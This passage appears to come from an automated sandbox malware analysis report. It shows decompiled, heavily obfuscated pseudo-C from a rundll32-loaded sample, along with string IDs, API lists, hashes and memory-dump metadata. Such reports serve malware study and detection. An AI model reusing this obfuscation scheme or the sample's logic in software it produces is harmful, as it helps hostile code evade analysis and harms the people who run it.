                                                                                                                                  				asm("stosd");
                                                                                                                                  				_v40 = 0xa3a3c;
                                                                                                                                  				_v40 = _v40 + 0x2c25;
                                                                                                                                  				_v40 = _v40 ^ 0x000a7661;
                                                                                                                                  				_v16 = 0x75ee44;
                                                                                                                                  				_t130 = 0x7a;
                                                                                                                                  				_v16 = _v16 / _t130;
                                                                                                                                  				_v16 = _v16 ^ 0xc9e42672;
                                                                                                                                  				_v16 = _v16 ^ 0xc9e58a7e;
                                                                                                                                  				_v8 = 0x386b92;
                                                                                                                                  				_v8 = _v8 << 4;
                                                                                                                                  				_v8 = _v8 | 0x0ec9a536;
                                                                                                                                  				_v8 = _v8 >> 0xf;
                                                                                                                                  				_v8 = _v8 ^ 0x000b4478;
                                                                                                                                  				_v44 = 0xd66787;
                                                                                                                                  				_v44 = _v44 >> 3;
                                                                                                                                  				_v44 = _v44 ^ 0x001d593f;
                                                                                                                                  				_v24 = 0x7c5a73;
                                                                                                                                  				_v24 = _v24 | 0xae316990;
                                                                                                                                  				_t131 = 0x19;
                                                                                                                                  				_v24 = _v24 / _t131;
                                                                                                                                  				_v24 = _v24 ^ 0x06f0967a;
                                                                                                                                  				_v20 = 0x3dfd52;
                                                                                                                                  				_v20 = _v20 >> 8;
                                                                                                                                  				_v20 = _v20 * 0x24;
                                                                                                                                  				_v20 = _v20 ^ 0x0009affd;
                                                                                                                                  				_v12 = 0xf0c6a5;
                                                                                                                                  				_v12 = _v12 + 0xffff2be4;
                                                                                                                                  				_v12 = _v12 + 0x1686;
                                                                                                                                  				_v12 = _v12 << 2;
                                                                                                                                  				_v12 = _v12 ^ 0x03c3840c;
                                                                                                                                  				_v48 = 0x30c967;
                                                                                                                                  				_v48 = _v48 | 0xcae095b2;
                                                                                                                                  				_v48 = _v48 ^ 0xcaf7f966;
                                                                                                                                  				_v36 = 0xabcbdc;
                                                                                                                                  				_v36 = _v36 + 0xfffff856;
                                                                                                                                  				_v36 = _v36 | 0xb2b71321;
                                                                                                                                  				_v36 = _v36 ^ 0xb2b3c312;
                                                                                                                                  				_v32 = 0xda8dbe;
                                                                                                                                  				_v32 = _v32 + 0xffff364b;
                                                                                                                                  				_v32 = _v32 | 0x02598b37;
                                                                                                                                  				_v32 = _v32 ^ 0x02d31c0a;
                                                                                                                                  				_v28 = 0x528ee8;
                                                                                                                                  				_v28 = _v28 * 0x12;
                                                                                                                                  				_v28 = _v28 << 2;
                                                                                                                                  				_v28 = _v28 ^ 0x17383776;
                                                                                                                                  				_t115 = E002D91DD(__ecx, _v40, __ecx);
                                                                                                                                  				_t132 = _t115;
                                                                                                                                  				if(_t115 != 0) {
                                                                                                                                  					_t133 = E002D76AA(_a12,  &_v52, _v44, _v24, __ecx, _v20, _t132, _v12);
                                                                                                                                  					E002E1E67(_v48, _v36, _v32, _v28, _t132);
                                                                                                                                  				}
                                                                                                                                  				return _t133;
                                                                                                                                  			}

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Du$av$d)4$sZ|
                                                                                                                                  • API String ID: 0-269012183
                                                                                                                                  • Opcode ID: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
                                                                                                                                  • Instruction ID: 4a605d31ef6e404335e70239bb1561e4b1e448b48068713a1d4bdcb299d565c6
                                                                                                                                  • Opcode Fuzzy Hash: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
                                                                                                                                  • Instruction Fuzzy Hash: 5C5102B1D00209EBDF09DFE5C94A8EEBBB1FB48318F108159E412B6260D3755A59DFA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetThreadLocale.KERNEL32 ref: 10043743
                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10043755
                                                                                                                                  • GetACP.KERNEL32 ref: 1004377E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale$InfoThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4232894706-0
                                                                                                                                  • Opcode ID: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
                                                                                                                                  • Instruction ID: 788673dfdacf9fce6eb7172e6dd538a5e2a4211a9e61a4e82855ee0bc522c5dc
                                                                                                                                  • Opcode Fuzzy Hash: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
                                                                                                                                  • Instruction Fuzzy Hash: 8AF0C871E04238ABE715DBA489955EFB7E4EB09A81B11816CD981E7251EA206D0487C9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                                  • Instruction ID: 3e933570e0ddfcbf732aafa8bdad2c1db21bb76b11c706ff9f14b0ef8e609435
                                                                                                                                  • Opcode Fuzzy Hash: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                                  • Instruction Fuzzy Hash: 63F03731505119EBDF01DF70CD48AAE3FA9FB04284F008020FD09D9060EB31EB95EBA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                  			E002E0E53(void* __ecx) {
                                                                                                                                  				char _v520;
                                                                                                                                  				char _v1040;
                                                                                                                                  				char _v1560;
                                                                                                                                  				char _v2080;
                                                                                                                                  				char _v2600;
                                                                                                                                  				signed int _v2604;
                                                                                                                                  				signed int _v2608;
                                                                                                                                  				signed int _v2612;
                                                                                                                                  				signed int _v2616;
                                                                                                                                  				signed int _v2620;
                                                                                                                                  				signed int _v2624;
                                                                                                                                  				signed int _v2628;
                                                                                                                                  				signed int _v2632;
                                                                                                                                  				signed int _v2636;
                                                                                                                                  				signed int _v2640;
                                                                                                                                  				signed int _v2644;
                                                                                                                                  				signed int _v2648;
                                                                                                                                  				signed int _v2652;
                                                                                                                                  				signed int _v2656;
                                                                                                                                  				signed int _v2660;
                                                                                                                                  				signed int _v2664;
                                                                                                                                  				signed int _v2668;
                                                                                                                                  				signed int _v2672;
                                                                                                                                  				signed int _v2676;
                                                                                                                                  				signed int _v2680;
                                                                                                                                  				signed int _v2684;
                                                                                                                                  				signed int _v2688;
                                                                                                                                  				signed int _v2692;
                                                                                                                                  				signed int _v2696;
                                                                                                                                  				signed int _v2700;
                                                                                                                                  				signed int _v2704;
                                                                                                                                  				signed int _v2708;
                                                                                                                                  				signed int _v2712;
                                                                                                                                  				signed int _v2716;
                                                                                                                                  				signed int _v2720;
                                                                                                                                  				signed int _v2724;
                                                                                                                                  				signed int _v2728;
                                                                                                                                  				signed int _v2732;
                                                                                                                                  				signed int _v2736;
                                                                                                                                  				signed int _v2740;
                                                                                                                                  				signed int _v2744;
                                                                                                                                  				signed int _v2748;
                                                                                                                                  				signed int _v2752;
                                                                                                                                  				signed int _v2756;
                                                                                                                                  				signed int _v2760;
                                                                                                                                  				signed int _v2764;
                                                                                                                                  				signed int _v2768;
                                                                                                                                  				signed int _v2772;
                                                                                                                                  				signed int _t406;
                                                                                                                                  				signed int _t426;
                                                                                                                                  				signed int _t427;
                                                                                                                                  				signed int _t428;
                                                                                                                                  				signed int _t429;
                                                                                                                                  				signed int _t430;
                                                                                                                                  				signed int _t435;
                                                                                                                                  				void* _t467;
                                                                                                                                  				void* _t468;
                                                                                                                                  				signed int* _t472;
                                                                                                                                  
                                                                                                                                  				_t472 =  &_v2772;
                                                                                                                                  				_v2700 = 0xd36ba7;
                                                                                                                                  				_v2700 = _v2700 << 7;
                                                                                                                                  				_v2700 = _v2700 ^ 0xaed70c65;
                                                                                                                                  				_v2700 = _v2700 ^ 0xc762dfcc;
                                                                                                                                  				_v2652 = 0x6f4609;
                                                                                                                                  				_t9 =  &_v2652; // 0x6f4609
                                                                                                                                  				_v2652 =  *_t9 * 0x1c;
                                                                                                                                  				_t467 = __ecx;
                                                                                                                                  				_v2652 = _v2652 ^ 0x0c23569d;
                                                                                                                                  				_t468 = 0xea1969c;
                                                                                                                                  				_v2608 = 0xb8394b;
                                                                                                                                  				_v2608 = _v2608 + 0xaeb5;
                                                                                                                                  				_v2608 = _v2608 ^ 0x00b390c3;
                                                                                                                                  				_v2736 = 0x3d33f1;
                                                                                                                                  				_v2736 = _v2736 + 0xffffd537;
                                                                                                                                  				_v2736 = _v2736 + 0xffffb6ee;
                                                                                                                                  				_v2736 = _v2736 + 0xbad8;
                                                                                                                                  				_v2736 = _v2736 ^ 0x003e0409;
                                                                                                                                  				_v2768 = 0xd1d4ce;
                                                                                                                                  				_v2768 = _v2768 >> 0xc;
                                                                                                                                  				_v2768 = _v2768 ^ 0xb5c37fe4;
                                                                                                                                  				_v2768 = _v2768 + 0x4eb3;
                                                                                                                                  				_v2768 = _v2768 ^ 0xb5c2c9c4;
                                                                                                                                  				_v2760 = 0x157bbd;
                                                                                                                                  				_v2760 = _v2760 ^ 0x6d7617e7;
                                                                                                                                  				_v2760 = _v2760 ^ 0x1b56cd2f;
                                                                                                                                  				_v2760 = _v2760 ^ 0xfb63426d;
                                                                                                                                  				_v2760 = _v2760 ^ 0x8d577604;
                                                                                                                                  				_v2604 = 0x1fac8b;
                                                                                                                                  				_v2604 = _v2604 + 0x9962;
                                                                                                                                  				_v2604 = _v2604 ^ 0x0029d956;
                                                                                                                                  				_v2696 = 0x3d46b4;
                                                                                                                                  				_v2696 = _v2696 | 0x3d7fd3ff;
                                                                                                                                  				_v2696 = _v2696 ^ 0x3d7bd02d;
                                                                                                                                  				_v2720 = 0xad1695;
                                                                                                                                  				_t426 = 9;
                                                                                                                                  				_v2720 = _v2720 * 0x4b;
                                                                                                                                  				_v2720 = _v2720 >> 0x10;
                                                                                                                                  				_v2720 = _v2720 << 0xe;
                                                                                                                                  				_v2720 = _v2720 ^ 0x0cab1f79;
                                                                                                                                  				_v2644 = 0xe14118;
                                                                                                                                  				_v2644 = _v2644 ^ 0x82369820;
                                                                                                                                  				_v2644 = _v2644 ^ 0x82de8a4e;
                                                                                                                                  				_v2668 = 0x391c30;
                                                                                                                                  				_v2668 = _v2668 >> 7;
                                                                                                                                  				_v2668 = _v2668 + 0xffff3589;
                                                                                                                                  				_v2668 = _v2668 ^ 0xfff6d862;
                                                                                                                                  				_v2692 = 0x9dbc3;
                                                                                                                                  				_v2692 = _v2692 << 8;
                                                                                                                                  				_v2692 = _v2692 * 0x75;
                                                                                                                                  				_v2692 = _v2692 ^ 0x81749ad9;
                                                                                                                                  				_v2660 = 0x144a46;
                                                                                                                                  				_v2660 = _v2660 >> 0xd;
                                                                                                                                  				_v2660 = _v2660 ^ 0x0008b8c7;
                                                                                                                                  				_v2752 = 0x703c03;
                                                                                                                                  				_v2752 = _v2752 * 0x74;
                                                                                                                                  				_v2752 = _v2752 ^ 0x2e54cb21;
                                                                                                                                  				_v2752 = _v2752 | 0x6f17e683;
                                                                                                                                  				_v2752 = _v2752 ^ 0x7f96e2f0;
                                                                                                                                  				_v2676 = 0xa438e5;
                                                                                                                                  				_v2676 = _v2676 / _t426;
                                                                                                                                  				_v2676 = _v2676 + 0x92ff;
                                                                                                                                  				_v2676 = _v2676 ^ 0x0015b827;
                                                                                                                                  				_v2612 = 0x1c48b9;
                                                                                                                                  				_t427 = 0x1a;
                                                                                                                                  				_v2612 = _v2612 / _t427;
                                                                                                                                  				_v2612 = _v2612 ^ 0x000154fb;
                                                                                                                                  				_v2628 = 0x490198;
                                                                                                                                  				_v2628 = _v2628 | 0x561f6486;
                                                                                                                                  				_v2628 = _v2628 ^ 0x565ec1b9;
                                                                                                                                  				_v2616 = 0xcec4ed;
                                                                                                                                  				_t428 = 0x3d;
                                                                                                                                  				_v2616 = _v2616 * 9;
                                                                                                                                  				_v2616 = _v2616 ^ 0x074f393e;
                                                                                                                                  				_v2636 = 0x4be85b;
                                                                                                                                  				_v2636 = _v2636 >> 1;
                                                                                                                                  				_v2636 = _v2636 ^ 0x002afd34;
                                                                                                                                  				_v2728 = 0xca47ed;
                                                                                                                                  				_v2728 = _v2728 << 1;
                                                                                                                                  				_v2728 = _v2728 / _t428;
                                                                                                                                  				_v2728 = _v2728 >> 3;
                                                                                                                                  				_v2728 = _v2728 ^ 0x00084593;
                                                                                                                                  				_v2620 = 0x793301;
                                                                                                                                  				_v2620 = _v2620 | 0xccc0d5da;
                                                                                                                                  				_v2620 = _v2620 ^ 0xccf56683;
                                                                                                                                  				_v2684 = 0xd6c9e7;
                                                                                                                                  				_v2684 = _v2684 >> 8;
                                                                                                                                  				_v2684 = _v2684 + 0x30fc;
                                                                                                                                  				_v2684 = _v2684 ^ 0x000dbf27;
                                                                                                                                  				_v2656 = 0x6cf887;
                                                                                                                                  				_v2656 = _v2656 | 0x54469415;
                                                                                                                                  				_v2656 = _v2656 ^ 0x5469dd96;
                                                                                                                                  				_v2712 = 0x1ba43e;
                                                                                                                                  				_v2712 = _v2712 + 0xffff54b6;
                                                                                                                                  				_v2712 = _v2712 >> 0x10;
                                                                                                                                  				_v2712 = _v2712 ^ 0x536d0b9d;
                                                                                                                                  				_v2712 = _v2712 ^ 0x5368fd88;
                                                                                                                                  				_v2744 = 0x7fa81e;
                                                                                                                                  				_v2744 = _v2744 + 0x45dd;
                                                                                                                                  				_v2744 = _v2744 | 0xcc5c3b14;
                                                                                                                                  				_t429 = 0x76;
                                                                                                                                  				_v2744 = _v2744 * 0x48;
                                                                                                                                  				_v2744 = _v2744 ^ 0x83f6fb81;
                                                                                                                                  				_v2704 = 0x73cce1;
                                                                                                                                  				_v2704 = _v2704 >> 6;
                                                                                                                                  				_v2704 = _v2704 | 0x0e0742c3;
                                                                                                                                  				_v2704 = _v2704 ^ 0x0e0521c8;
                                                                                                                                  				_v2764 = 0x3737a7;
                                                                                                                                  				_v2764 = _v2764 >> 0xb;
                                                                                                                                  				_v2764 = _v2764 << 3;
                                                                                                                                  				_v2764 = _v2764 + 0x14ac;
                                                                                                                                  				_v2764 = _v2764 ^ 0x0004654a;
                                                                                                                                  				_v2772 = 0xaeb57f;
                                                                                                                                  				_v2772 = _v2772 / _t429;
                                                                                                                                  				_v2772 = _v2772 << 0xf;
                                                                                                                                  				_t430 = 0x37;
                                                                                                                                  				_v2772 = _v2772 / _t430;
                                                                                                                                  				_v2772 = _v2772 ^ 0x037ee988;
                                                                                                                                  				_v2648 = 0x954498;
                                                                                                                                  				_t431 = 0x4b;
                                                                                                                                  				_v2648 = _v2648 / _t431;
                                                                                                                                  				_v2648 = _v2648 ^ 0x00054dec;
                                                                                                                                  				_v2640 = 0x8be41e;
                                                                                                                                  				_v2640 = _v2640 >> 0xd;
                                                                                                                                  				_v2640 = _v2640 ^ 0x00089615;
                                                                                                                                  				_v2748 = 0xfabe1b;
                                                                                                                                  				_v2748 = _v2748 ^ 0xff42a680;
                                                                                                                                  				_v2748 = _v2748 + 0xffff8ee7;
                                                                                                                                  				_v2748 = _v2748 + 0x1c5a;
                                                                                                                                  				_v2748 = _v2748 ^ 0xffbaa703;
                                                                                                                                  				_v2756 = 0x33a01d;
                                                                                                                                  				_v2756 = _v2756 * 0x6f;
                                                                                                                                  				_v2756 = _v2756 << 4;
                                                                                                                                  				_v2756 = _v2756 >> 4;
                                                                                                                                  				_v2756 = _v2756 ^ 0x066d94da;
                                                                                                                                  				_v2672 = 0x7cb69f;
                                                                                                                                  				_v2672 = _v2672 << 4;
                                                                                                                                  				_v2672 = _v2672 * 0x4a;
                                                                                                                                  				_v2672 = _v2672 ^ 0x40c5c2d0;
                                                                                                                                  				_v2680 = 0xc0e1f8;
                                                                                                                                  				_v2680 = _v2680 << 1;
                                                                                                                                  				_v2680 = _v2680 | 0xa5ca1830;
                                                                                                                                  				_v2680 = _v2680 ^ 0xa5ca6401;
                                                                                                                                  				_v2732 = 0xd52773;
                                                                                                                                  				_v2732 = _v2732 ^ 0x8b84e9f5;
                                                                                                                                  				_v2732 = _v2732 + 0xffffa58a;
                                                                                                                                  				_v2732 = _v2732 >> 1;
                                                                                                                                  				_v2732 = _v2732 ^ 0x45a69f9f;
                                                                                                                                  				_v2740 = 0x525c84;
                                                                                                                                  				_v2740 = _v2740 * 0x45;
                                                                                                                                  				_v2740 = _v2740 << 0xd;
                                                                                                                                  				_v2740 = _v2740 + 0xffffe485;
                                                                                                                                  				_v2740 = _v2740 ^ 0x5df42895;
                                                                                                                                  				_v2688 = 0x8afd1b;
                                                                                                                                  				_v2688 = _v2688 >> 0xa;
                                                                                                                                  				_v2688 = _v2688 * 0x44;
                                                                                                                                  				_v2688 = _v2688 ^ 0x000c822b;
                                                                                                                                  				_v2632 = 0xb6ec99;
                                                                                                                                  				_v2632 = _v2632 + 0xffff2a9a;
                                                                                                                                  				_v2632 = _v2632 ^ 0x00b1db1a;
                                                                                                                                  				_v2664 = 0xfa37e2;
                                                                                                                                  				_v2664 = _v2664 * 0x4c;
                                                                                                                                  				_v2664 = _v2664 + 0x9251;
                                                                                                                                  				_v2664 = _v2664 ^ 0x4a4e0c53;
                                                                                                                                  				_v2708 = 0xf9311d;
                                                                                                                                  				_v2708 = _v2708 >> 2;
                                                                                                                                  				_t406 = _v2708 * 0x30;
                                                                                                                                  				_v2708 = _t406;
                                                                                                                                  				_v2708 = _v2708 + 0xffffde46;
                                                                                                                                  				_v2708 = _v2708 ^ 0x0bad021b;
                                                                                                                                  				_v2624 = 0x51d14;
                                                                                                                                  				_v2624 = _v2624 | 0x271919e8;
                                                                                                                                  				_v2624 = _v2624 ^ 0x2716653c;
                                                                                                                                  				_v2716 = 0x708eea;
                                                                                                                                  				_v2716 = _v2716 + 0xfffff8d8;
                                                                                                                                  				_v2716 = _v2716 | 0x4ca3cf3c;
                                                                                                                                  				_v2716 = _v2716 ^ 0x396f5f4d;
                                                                                                                                  				_v2716 = _v2716 ^ 0x7599e4cd;
                                                                                                                                  				_v2724 = 0x3acc77;
                                                                                                                                  				_v2724 = _v2724 + 0x56d;
                                                                                                                                  				_v2724 = _v2724 + 0xb0bb;
                                                                                                                                  				_v2724 = _v2724 + 0xffffce89;
                                                                                                                                  				_v2724 = _v2724 ^ 0x003c4612;
                                                                                                                                  				while(_t468 != 0x5de06da) {
                                                                                                                                  					if(_t468 == 0xea1969c) {
                                                                                                                                  						_t468 = 0xfa9128f;
                                                                                                                                  						continue;
                                                                                                                                  					} else {
                                                                                                                                  						_t480 = _t468 - 0xfa9128f;
                                                                                                                                  						if(_t468 != 0xfa9128f) {
                                                                                                                                  							L8:
                                                                                                                                  							__eflags = _t468 - 0xa8e801c;
                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  						} else {
                                                                                                                                  							E002EDA22(_v2652, _v2608, _t480, _v2736,  &_v2600, _t431, _v2768);
                                                                                                                                  							 *((short*)(E002DB6CF( &_v2600, _v2760, _v2604, _v2696))) = 0;
                                                                                                                                  							E002D8969(_v2720,  &_v1560, _t480, _v2644, _v2668);
                                                                                                                                  							_push(_v2752);
                                                                                                                                  							_push(_v2660);
                                                                                                                                  							E002D47CE( &_v2600, _v2676, _v2692, _v2612, _v2628, E002EDCF7(_v2692, 0x2d1308, _t480),  &_v1560, _v2616, _v2636);
                                                                                                                                  							E002DA8B0(_v2728, _t419, _v2620);
                                                                                                                                  							_t431 = _v2684;
                                                                                                                                  							_t406 = E002DEA99(_v2684, _t467, _v2656, _v2712,  &_v2080, _v2744);
                                                                                                                                  							_t472 =  &(_t472[0x17]);
                                                                                                                                  							if(_t406 != 0) {
                                                                                                                                  								_t468 = 0x5de06da;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					return _t406;
                                                                                                                                  				}
                                                                                                                                  				_push(_v2648);
                                                                                                                                  				_push(_v2700);
                                                                                                                                  				_push(_v2772);
                                                                                                                                  				_push( &_v1040);
                                                                                                                                  				E002E46BB(_v2704, _v2764);
                                                                                                                                  				_push(_v2756);
                                                                                                                                  				_push(_v2748);
                                                                                                                                  				E002D47CE( &_v1040, _v2672, _v2640, _v2680, _v2732, E002EDCF7(_v2640, 0x2d13b8, __eflags),  &_v2080, _v2740, _v2688);
                                                                                                                                  				_t435 = _v2632;
                                                                                                                                  				E002DA8B0(_t435, _t409, _v2664);
                                                                                                                                  				__eflags = 0;
                                                                                                                                  				_push(_v2724);
                                                                                                                                  				_push(0);
                                                                                                                                  				_push(_t435);
                                                                                                                                  				_push(0);
                                                                                                                                  				_push(0);
                                                                                                                                  				_push(_v2716);
                                                                                                                                  				_t431 = _v2708;
                                                                                                                                  				_push( &_v520);
                                                                                                                                  				_t406 = E002DAB87(_v2708, _v2624, 0);
                                                                                                                                  				_t472 = _t472 - 0xc + 0x64;
                                                                                                                                  				_t468 = 0xa8e801c;
                                                                                                                                  				goto L8;
                                                                                                                                  			}





























































                                                                                                                                  0x002e15a9
                                                                                                                                  0x002e15f0
                                                                                                                                  0x002e15fc
                                                                                                                                  0x002e1605
                                                                                                                                  0x002e160d
                                                                                                                                  0x002e160f
                                                                                                                                  0x002e1613
                                                                                                                                  0x002e1614
                                                                                                                                  0x002e1615
                                                                                                                                  0x002e1616
                                                                                                                                  0x002e1617
                                                                                                                                  0x002e1629
                                                                                                                                  0x002e162d
                                                                                                                                  0x002e162e
                                                                                                                                  0x002e1633
                                                                                                                                  0x002e1636
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Fo$M_o9$[K
                                                                                                                                  • API String ID: 0-3743190696
                                                                                                                                  • Opcode ID: 1252f9bc5223e80d5a008b0fd729ab64064713a92057b2e11f5589b4e88bc572
                                                                                                                                  • Instruction ID: 734fa5b7f4af0106c9446b2eaa5c47529fcfaddaf8bd2a4ed066c9a5975d138a
                                                                                                                                  • Opcode Fuzzy Hash: 1252f9bc5223e80d5a008b0fd729ab64064713a92057b2e11f5589b4e88bc572
                                                                                                                                  • Instruction Fuzzy Hash: 6D120DB1409381CFD3A8CF21C58AA9BBBF1FBC4748F50891DE59A96260D7B18919CF53
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                  			E002D9DCF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				signed int _v84;
                                                                                                                                  				signed int _v88;
                                                                                                                                  				signed int _v92;
                                                                                                                                  				signed int _v96;
                                                                                                                                  				signed int _v100;
                                                                                                                                  				signed int _v104;
                                                                                                                                  				signed int _v108;
                                                                                                                                  				signed int _v112;
                                                                                                                                  				signed int _v116;
                                                                                                                                  				signed int _v120;
                                                                                                                                  				signed int _v124;
                                                                                                                                  				intOrPtr _v136;
                                                                                                                                  				char _v160;
                                                                                                                                  				short _v708;
                                                                                                                                  				short _v710;
                                                                                                                                  				char _v712;
                                                                                                                                  				signed int _v756;
                                                                                                                                  				char _v1276;
                                                                                                                                  				char _v1796;
                                                                                                                                  				void* _t278;
                                                                                                                                  				signed int _t306;
                                                                                                                                  				signed int _t310;
                                                                                                                                  				void* _t312;
                                                                                                                                  				intOrPtr _t317;
                                                                                                                                  				void* _t319;
                                                                                                                                  				signed int _t324;
                                                                                                                                  				void* _t327;
                                                                                                                                  				void* _t353;
                                                                                                                                  				signed int _t365;
                                                                                                                                  				signed int _t366;
                                                                                                                                  				signed int _t367;
                                                                                                                                  				signed int _t368;
                                                                                                                                  				signed int _t369;
                                                                                                                                  				signed int _t370;
                                                                                                                                  				void* _t373;
                                                                                                                                  				void* _t374;
                                                                                                                                  
                                                                                                                                  				_t317 = _a12;
                                                                                                                                  				_push(_a24);
                                                                                                                                  				_push(_a20);
                                                                                                                                  				_push(_a16);
                                                                                                                                  				_push(_t317);
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t278);
                                                                                                                                  				_v44 = 0x411c30;
                                                                                                                                  				_t374 = _t373 + 0x20;
                                                                                                                                  				_v44 = _v44 ^ 0x3aebcc2b;
                                                                                                                                  				_v44 = _v44 ^ 0x10090153;
                                                                                                                                  				_t319 = 0x338c922;
                                                                                                                                  				_v44 = _v44 ^ 0x2aa3d158;
                                                                                                                                  				_v56 = 0xa7c140;
                                                                                                                                  				_v56 = _v56 >> 1;
                                                                                                                                  				_v56 = _v56 ^ 0xbf613798;
                                                                                                                                  				_v56 = _v56 ^ 0xbf3c535c;
                                                                                                                                  				_v88 = 0xb7ebf9;
                                                                                                                                  				_t365 = 0x52;
                                                                                                                                  				_v88 = _v88 / _t365;
                                                                                                                                  				_v88 = _v88 ^ 0x0004e01e;
                                                                                                                                  				_v112 = 0x1a3e5b;
                                                                                                                                  				_v112 = _v112 + 0xd588;
                                                                                                                                  				_v112 = _v112 ^ 0x0012c9bc;
                                                                                                                                  				_v8 = 0x55b84a;
                                                                                                                                  				_t366 = 0x72;
                                                                                                                                  				_v8 = _v8 * 0x74;
                                                                                                                                  				_v8 = _v8 + 0xffff07de;
                                                                                                                                  				_v8 = _v8 * 0x41;
                                                                                                                                  				_v8 = _v8 ^ 0xdc74eedb;
                                                                                                                                  				_v96 = 0x123c4e;
                                                                                                                                  				_v96 = _v96 + 0x1d06;
                                                                                                                                  				_v96 = _v96 ^ 0x001f978b;
                                                                                                                                  				_v124 = 0x58f8d3;
                                                                                                                                  				_v124 = _v124 * 0x2b;
                                                                                                                                  				_v124 = _v124 ^ 0x0efbe47e;
                                                                                                                                  				_v120 = 0x58d481;
                                                                                                                                  				_v120 = _v120 << 5;
                                                                                                                                  				_v120 = _v120 ^ 0x0b1fdd63;
                                                                                                                                  				_v32 = 0x85548e;
